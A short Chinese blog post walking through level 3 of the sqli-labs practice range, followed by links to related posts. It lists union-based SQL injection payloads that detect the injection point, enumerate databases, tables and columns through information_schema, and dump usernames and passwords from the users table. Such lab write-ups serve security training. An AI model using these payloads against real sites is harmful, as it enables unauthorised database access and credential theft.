SQL注入sqli_labs靶场第三题

?id=1'and 1=1 and '1'='1和?id=1'and 1=1 and '1'='1进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为字符型注入。

根据报错信息判断为单引号带括号注入

联合查询:

猜解列名

?id=1') order by 3--+

判断回显点

?id=-1') union select 1,2,3--+

爆库、版本号、权限

?id=-1') union select 1,database(),version()--+
?id=-1') union select 1,2,user()--+

爆表、爆列

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

爆账号密码

?id=-1') union select 1,2,(select group_concat(username,password))from users

相关推荐
花青泽2 小时前
5-数据库-SQL注入-联合查询-关键字绕过-day13
数据库·sql
龙仔72510 小时前
人大金仓 KingbaseES V8 只读账号创建完整运维笔记
运维·笔记·sql·人大金仓
神龙天舞200110 小时前
MySQL 备库为什么会延迟好几个小时
android·数据库·mysql
每天都要进步哦15 小时前
SQL单行函数详解:字符、数字、日期、转换与通用函数全解析
数据库·mysql
不剪发的Tony老师15 小时前
VeloxDB:一款免费开源的轻量级数据库管理工具
数据库·sql
dotnet9015 小时前
批量生成所有表的修改脚本
数据库·sql·oracle
南凉北往16 小时前
PandasAI连接LLM对MySQL数据库进行数据分析
数据库·mysql·数据分析
灯澜忆梦17 小时前
【MySQL7】多表查询
数据库·sql
Qlittleboy17 小时前
tp5网站链接不上slqserver,计算机积极拒绝了链接
数据库·sql
【心态好不摆烂】19 小时前
MySQL——复合查询
数据库·mysql